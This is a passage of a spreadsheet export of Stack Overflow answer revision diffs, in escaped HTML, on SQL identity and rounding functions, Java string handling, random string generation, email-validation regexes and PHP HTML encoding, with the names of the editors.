 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;@@IDENTITY&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; is&lt;/span&gt; the last identity inserted using the current SQL Connection. This is a good value to return from an insert stored procedure, where you just need the identity inserted for your new record, and don't care if more rows were added afterward.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;SCOPE_IDENTITY&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; is&lt;/span&gt; the last identity inserted using the current SQL Connection, and in the current scope -- that is, if there was a second &lt;span class="diff-add"&gt;IDENTITY&lt;/span&gt; inserted based on a trigger after your insert, it would not be reflected in &lt;span class="diff-add"&gt;SCOPE_IDENTITY&lt;/span&gt;, only the insert you performed. Frankly, I have never had a reason to use this.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;IDENT_CURRENT(tablename)&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; is&lt;/span&gt; the last identity inserted regardless of connection or scope. You could use this if you want to get the current &lt;span class="diff-add"&gt;IDENTITY&lt;/span&gt; value for a table that you have not inserted a record into.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Guy Starbuck</t>
  </si>
  <si>
    <t>Ali</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're happy to use Apache classes, you could use &lt;a href="https://commons.apache.org/proper/commons-text/javadocs/api-release/org/apache/commons/text/RandomStringGenerator.html" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;org.apache.commons.text.RandomStringGenerator&lt;/span&gt;&lt;/code&gt;&lt;/a&gt; (commons&lt;span class="diff-delete"&gt;-text).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Example:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;RandomStringGenerator randomStringGenerator =_x000D_
        &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; RandomStringGenerator.Builder()_x000D_
                .withinRange(&lt;span class="hljs-string"&gt;'0'&lt;/span&gt;, &lt;span class="hljs-string"&gt;'z'&lt;/span&gt;)_x000D_
                .filteredBy(CharacterPredicates.LETTERS, CharacterPredicates.DIGITS)_x000D_
                .build();_x000D_
randomStringGenerator.generate(&lt;span class="hljs-number"&gt;12&lt;/span&gt;);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Since commons&lt;/span&gt;-lang&lt;span class="diff-delete"&gt; 3.6, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;RandomStringUtils&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is deprecated&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you're happy to use Apache classes, you could use &lt;a href="https://commons.apache.org/proper/commons-lang/javadocs/api-2.6/org/apache/commons/lang/RandomStringUtils.html" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;org.apache.commons.lang.RandomStringUtils&lt;/span&gt;&lt;/code&gt;&lt;/a&gt; (commons-lang&lt;span class="diff-add"&gt;)&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>numéro6</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've found this to be a language and programming-paradigm thing. One paradigm â€” OOP â€” refers to objects with member methods, which conceptually are how you send messages to those objects (this view is reflected in UML, for example).&lt;/p&gt; _x000D_
 &lt;p&gt; Another paradigm â€” functional â€” may or may not involve classes of objects, but functions are merely the atomic unit of work.&lt;/p&gt; _x000D_
 &lt;p&gt; In structured programming, you had sub-routines (notice that the prefix "sub" implies structure).&lt;/p&gt; _x000D_
 &lt;p&gt; In imperative programming (which overlaps with structured quite a lot, but a slightly different way of looking at things), you have a more formulaic view of the world, and so &lt;span class="diff-delete"&gt;'procedures'&lt;/span&gt; represent some operation.&lt;/p&gt; _x000D_
 &lt;p&gt; All you have to do to not sound like a rube is to use the terminology used by the language reference for the language you're using.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've found this to be a language and programming-paradigm thing. One paradigm â€” OOP â€” refers to objects with member methods, which conceptually are how you send messages to those objects (this view is reflected in UML, for example).&lt;/p&gt; _x000D_
 &lt;p&gt; Another paradigm â€” functional â€” may or may not involve classes of objects, but functions are merely the atomic unit of work.&lt;/p&gt; _x000D_
 &lt;p&gt; In structured programming, you had sub-routines (notice that the prefix "sub" implies structure).&lt;/p&gt; _x000D_
 &lt;p&gt; In imperative programming (which overlaps with structured quite a lot, but a slightly different way of looking at things), you have a more formulaic view of the world, and so &lt;span class="diff-add"&gt;'functions'&lt;/span&gt; represent some operation&lt;span class="diff-add"&gt; (often mathematical)&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; All you have to do to not sound like a rube is to use the terminology used by the language reference for the language you're using.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ben Collins</t>
  </si>
  <si>
    <t>John Millikin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select round(123.456, 2, 1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;a href="https://docs.microsoft.com/en-us/sql/t-sql/functions/round-transact-sql?view=sql-server-2017" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Transact-SQL &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;ROUND&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ROUND ( numeric_expression , length [ ,function ] )  _x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Returns a numeric value, rounded to the specified length or precision.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Arguments&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;numeric_expression&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Is an expression of the exact numeric or approximate numeric data type category, except for the bit data type.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;length&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Is the precision to which numeric_expression is to be rounded. length must be an expression of type tinyint, smallint, or int. When length is a positive number, numeric_expression is rounded to the number of decimal positions specified by length. When length is a negative number, numeric_expression is rounded on the left side of the decimal point, as specified by length.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;function&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Is the type of operation to perform. function must be tinyint, smallint, or int. When function is omitted or has a value of 0 (default), numeric_expression is rounded. When a value other than 0 is specified, numeric_expression is truncated.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select round(123.456, 2, 1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Paul</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;System.Reflection.MethodBase.GetCurrentMethod().Name;&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;System.Reflection.MethodBase.GetCurrentMethod().Name;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ed Guiness</t>
  </si>
  <si>
    <t>Kyle Rosendo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've successfully used &lt;a href="http://sourceforge.net/projects/hpop/" rel="nofollow noreferrer"&gt;OpenPop.NET&lt;/a&gt; to access emails via POP3. If you're looking to do it over SSL, see this&lt;span class="diff-delete"&gt; Floresense Post&lt;/span&gt; &lt;em&gt;&lt;span class="diff-delete"&gt;REDACTED LINK DUE TO VIRUS&lt;/span&gt;&lt;/em&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've successfully used &lt;a href="http://sourceforge.net/projects/hpop/" rel="nofollow noreferrer"&gt;OpenPop.NET&lt;/a&gt; to access emails via POP3. If you're looking to do it over SSL, see this &lt;a href="http://www.floresense.com/resc_center/?art=1407" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Floresense Post&lt;/span&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>bkaid</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To create an &lt;code&gt;ImageIcon&lt;/code&gt; from an image file within the same jars your code is loaded:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;new javax.swing.ImageIcon(getClass().getResource("myimage.jpeg"&lt;span class="diff-delete"&gt;)&lt;/span&gt;)&lt;span class="diff-delete"&gt;;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Class.getResource&lt;/code&gt; returns a URL of a resource (or &lt;code&gt;null&lt;/code&gt;!). &lt;code&gt;ImageIcon&lt;/code&gt; has a constructors that load from a URL.&lt;/p&gt; _x000D_
 &lt;p&gt; To construct a URL for a resource in a jar not on your "classpath", see the documentation for &lt;code&gt;java.net.JarURLConnection&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To create an &lt;code&gt;ImageIcon&lt;/code&gt; from an image file within the same jars your code is loaded:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;new javax.swing.ImageIcon(getClass().getResource("myimage.jpeg")_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Class.getResource&lt;/code&gt; returns a URL of a resource (or &lt;code&gt;null&lt;/code&gt;!). &lt;code&gt;ImageIcon&lt;/code&gt; has a constructors that load from a URL.&lt;/p&gt; _x000D_
 &lt;p&gt; To construct a URL for a resource in a jar not on your "classpath", see the documentation for &lt;code&gt;java.net.JarURLConnection&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tom Hawtin - tackline</t>
  </si>
  <si>
    <t>David Kroukamp</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select _x000D_
datepart(&lt;span class="diff-delete"&gt;day&lt;/span&gt;,getdate()) -- integer &lt;span class="diff-delete"&gt;day of a month &lt;/span&gt;(1,2,3...&lt;span class="diff-delete"&gt;28/29/30/31&lt;/span&gt;)_x000D_
,datepart(year,getdate()) -- integer_x000D_
,datename(month,getdate()) -- string ('September',...)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select _x000D_
datepart(&lt;span class="diff-add"&gt;month&lt;/span&gt;,getdate()) -- integer (1,2,3...)_x000D_
,datepart(year,getdate()) -- integer_x000D_
,datename(month,getdate()) -- string ('September',...)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>SWeko</t>
  </si>
  <si>
    <t>Pravin Pawar</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Using &lt;a href="http://en.wikipedia.org/wiki/Regular_expression" rel="nofollow noreferrer"&gt;regular expressions&lt;/a&gt; is probably the best way. Here's an example (&lt;a href="http://jsbin.com/ozeyag/19" rel="nofollow noreferrer"&gt;live demo&lt;/a&gt;):&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;validateEmail&lt;/span&gt;(&lt;span class="hljs-params"&gt;email&lt;/span&gt;) &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; re = &lt;span class="hljs-regexp"&gt;/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; re.test(email);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Here's the example of regular expresion that accepts unicode:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; re = &lt;span class="hljs-regexp"&gt;/^(([^&amp;lt;&amp;gt;()[\]\.,;:\s@\"]+(\.[^&amp;lt;&amp;gt;()[\]\.,;:\s@\"]+)*)|(\".+\"))@(([^&amp;lt;&amp;gt;()[\]\.,;:\s@\"]+\.)+[^&amp;lt;&amp;gt;()[\]\.,;:\s@\"]{2,})$/i&lt;/span&gt;;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; But keep in mind that one should not rely only upon JavaScript validation. JavaScript can easily be disabled. This should be validated on the server side as well.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Using &lt;a href="http://en.wikipedia.org/wiki/Regular_expression" rel="nofollow noreferrer"&gt;regular expressions&lt;/a&gt; is probably the best way. Here's an example (&lt;a href="http://jsbin.com/ozeyag/19" rel="nofollow noreferrer"&gt;live demo&lt;/a&gt;):&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;function&lt;/span&gt; &lt;span class="hljs-title"&gt;validateEmail&lt;/span&gt;(&lt;span class="hljs-params"&gt;email&lt;/span&gt;) &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; re = &lt;span class="hljs-regexp"&gt;/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; re.test(email);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But keep in mind that one should not rely only upon JavaScript validation. JavaScript can easily be disabled. This should be validated on the server side as well.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Piskvor left the building</t>
  </si>
  <si>
    <t>Kee</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From the PHP documentation for &lt;a href="http://us2.php.net/htmlentities" rel="nofollow noreferrer"&gt;htmlentities&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; This function is identical to &lt;code&gt;htmlspecialchars()&lt;/code&gt; in all ways, except with &lt;code&gt;htmlentities()&lt;/code&gt;, all characters which have HTML character entity equivalents are translated into these entities.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; From the PHP documentation for &lt;a href="http://us.php.net/htmlspecialchars" rel="nofollow noreferrer"&gt;htmlspecialchars&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Certain characters have special significance in HTML, and should be represented by HTML entities if they are to preserve their meanings. This function returns a string with some of these conversions made; the translations made are those most useful for everyday web programming. If you require all HTML character entities to be translated, use &lt;code&gt;htmlentities()&lt;/code&gt; instead.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The difference is what gets encoded. The choices are everything (entities) or&lt;span class="diff-delete"&gt; everything minus&lt;/span&gt; "special" characters, like ampersand, double and single quotes, less than, and greater than (specialchars).&lt;/p&gt; _x000D_
 &lt;p&gt; I prefer to use &lt;code&gt;htmlspecialchars&lt;/code&gt; whenever possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From the PHP documentation for &lt;a href="http://us2.php.net/htmlentities" rel="nofollow noreferrer"&gt;htmlentities&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; This function is identical to &lt;code&gt;htmlspecialchars()&lt;/code&gt; in all ways, except with &lt;code&gt;htmlentities()&lt;/code&gt;, all characters which have HTML character entity equivalents are translated into these entities.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; From the PHP documentation for &lt;a href="http://us.php.net/htmlspecialchars" rel="nofollow noreferrer"&gt;htmlspecialchars&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Certain characters have special significance in HTML, and should be represented by HTML entities if they are to preserve their meanings. This function returns a string with some of these conversions made; the translations made are those most useful for everyday web programming. If you require all HTML character entities to be translated, use &lt;code&gt;htmlentities()&lt;/code&gt; instead.&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; The difference is what gets encoded. The choices are everything (entities) or "special" characters, like ampersand, double and single quotes, less than, and greater than (specialchars).&lt;/p&gt; _x000D_
 &lt;p&gt; I prefer to use &lt;code&gt;htmlspecialchars&lt;/code&gt; whenever possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Thomas Owens</t>
  </si>
  <si>
    <t>Jannie Theunissen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; No, not quite.&lt;/p&gt; _x000D_
 &lt;p&gt; Firstly, there's a slight difference in semantics. If &lt;code&gt;a&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt;, then &lt;code&gt;a.concat(b)&lt;/code&gt; &lt;span class="diff-delete"&gt;results in &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;NullPointerException&lt;/span&gt;&lt;/code&gt; but &lt;code&gt;a+=b&lt;/code&gt; will treat the original value of &lt;code&gt;a&lt;/code&gt; as if it were &lt;code&gt;null&lt;/code&gt;. Furthermore, the &lt;code&gt;concat()&lt;/code&gt; method only accepts &lt;code&gt;String&lt;/code&gt; values while the &lt;code&gt;+&lt;/code&gt; operator will silently convert the argument to a String (using the &lt;code&gt;toString()&lt;/code&gt; method for objects). So the &lt;code&gt;concat()&lt;/code&gt; method is more strict in what it accepts.&lt;/p&gt; _x000D_
 &lt;p&gt; To look under the hood, write a simple class with a += b;&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Concat&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;String &lt;span class="hljs-title"&gt;cat&lt;/span&gt;&lt;span class="hljs-params"&gt;(String a, String b)&lt;/span&gt; &lt;/span&gt;{_x000D_
        a += b;_x000D_
        &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; a;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now disassemble with javap -c (included in the Sun JDK). You should see a listing including:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;java.lang.&lt;span class="hljs-function"&gt;String &lt;span class="hljs-title"&gt;cat&lt;/span&gt;&lt;span class="hljs-params"&gt;(java.lang.String, java.lang.String)&lt;/span&gt;&lt;/span&gt;;_x000D_
  Code:_x000D_
   &lt;span class="hljs-number"&gt;0&lt;/span&gt;:   &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;     #&lt;span class="hljs-number"&gt;2&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//class java/lang/StringBuilder&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;3&lt;/span&gt;:   dup_x000D_
   &lt;span class="hljs-number"&gt;4&lt;/span&gt;:   invokespecial   #&lt;span class="hljs-number"&gt;3&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder."&amp;lt;init&amp;gt;":()V&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;7&lt;/span&gt;:   aload_1_x000D_
   &lt;span class="hljs-number"&gt;8&lt;/span&gt;:   invokevirtual   #&lt;span class="hljs-number"&gt;4&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;11&lt;/span&gt;:  aload_2_x000D_
   &lt;span class="hljs-number"&gt;12&lt;/span&gt;:  invokevirtual   #&lt;span class="hljs-number"&gt;4&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;15&lt;/span&gt;:  invokevirtual   #&lt;span class="hljs-number"&gt;5&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.toString:()Ljava/lang/    String;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;18&lt;/span&gt;:  astore_1_x000D_
   &lt;span class="hljs-number"&gt;19&lt;/span&gt;:  aload_1_x000D_
   &lt;span class="hljs-number"&gt;20&lt;/span&gt;:  areturn_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So, a += b is the equivalent of&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;a = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringBuilder()_x000D_
    .append(a)_x000D_
    .append(b)_x000D_
    .toString();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;concat&lt;/code&gt; method should be faster. However, with more strings the &lt;code&gt;StringBuilder&lt;/code&gt; method wins, at least in terms of performance.&lt;/p&gt; _x000D_
 &lt;p&gt; The source code of &lt;code&gt;String&lt;/code&gt; and &lt;code&gt;StringBuilder&lt;/code&gt; (and its package-private base class) is available in src.zip of the Sun JDK. You can see that you are building up a char array (resizing as necessary) and then throwing it away when you create the final &lt;code&gt;String&lt;/code&gt;. In practice memory allocation is surprisingly fast.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; No, not quite.&lt;/p&gt; _x000D_
 &lt;p&gt; Firstly, there's a slight difference in semantics. If &lt;code&gt;a&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt;, then &lt;code&gt;a.concat(b)&lt;/code&gt; &lt;span class="diff-add"&gt;NPEs&lt;/span&gt; but &lt;code&gt;a+=b&lt;/code&gt; will treat the original value of &lt;code&gt;a&lt;/code&gt; as if it were &lt;code&gt;null&lt;/code&gt;. Furthermore, the &lt;code&gt;concat()&lt;/code&gt; method only accepts &lt;code&gt;String&lt;/code&gt; values while the &lt;code&gt;+&lt;/code&gt; operator will silently convert the argument to a String (using the &lt;code&gt;toString()&lt;/code&gt; method for objects). So the &lt;code&gt;concat()&lt;/code&gt; method is more strict in what it accepts.&lt;/p&gt; _x000D_
 &lt;p&gt; To look under the hood, write a simple class with a += b;&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Concat&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;String &lt;span class="hljs-title"&gt;cat&lt;/span&gt;&lt;span class="hljs-params"&gt;(String a, String b)&lt;/span&gt; &lt;/span&gt;{_x000D_
        a += b;_x000D_
        &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; a;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now disassemble with javap -c (included in the Sun JDK). You should see a listing including:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;java.lang.&lt;span class="hljs-function"&gt;String &lt;span class="hljs-title"&gt;cat&lt;/span&gt;&lt;span class="hljs-params"&gt;(java.lang.String, java.lang.String)&lt;/span&gt;&lt;/span&gt;;_x000D_
  Code:_x000D_
   &lt;span class="hljs-number"&gt;0&lt;/span&gt;:   &lt;span class="hljs-keyword"&gt;new&lt;/span&gt;     #&lt;span class="hljs-number"&gt;2&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//class java/lang/StringBuilder&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;3&lt;/span&gt;:   dup_x000D_
   &lt;span class="hljs-number"&gt;4&lt;/span&gt;:   invokespecial   #&lt;span class="hljs-number"&gt;3&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder."&amp;lt;init&amp;gt;":()V&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;7&lt;/span&gt;:   aload_1_x000D_
   &lt;span class="hljs-number"&gt;8&lt;/span&gt;:   invokevirtual   #&lt;span class="hljs-number"&gt;4&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;11&lt;/span&gt;:  aload_2_x000D_
   &lt;span class="hljs-number"&gt;12&lt;/span&gt;:  invokevirtual   #&lt;span class="hljs-number"&gt;4&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;15&lt;/span&gt;:  invokevirtual   #&lt;span class="hljs-number"&gt;5&lt;/span&gt;; &lt;span class="hljs-comment"&gt;//Method java/lang/StringBuilder.toString:()Ljava/lang/    String;&lt;/span&gt;_x000D_
   &lt;span class="hljs-number"&gt;18&lt;/span&gt;:  astore_1_x000D_
   &lt;span class="hljs-number"&gt;19&lt;/span&gt;:  aload_1_x000D_
   &lt;span class="hljs-number"&gt;20&lt;/span&gt;:  areturn_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So, a += b is the equivalent of&lt;/p&gt; _x000D_
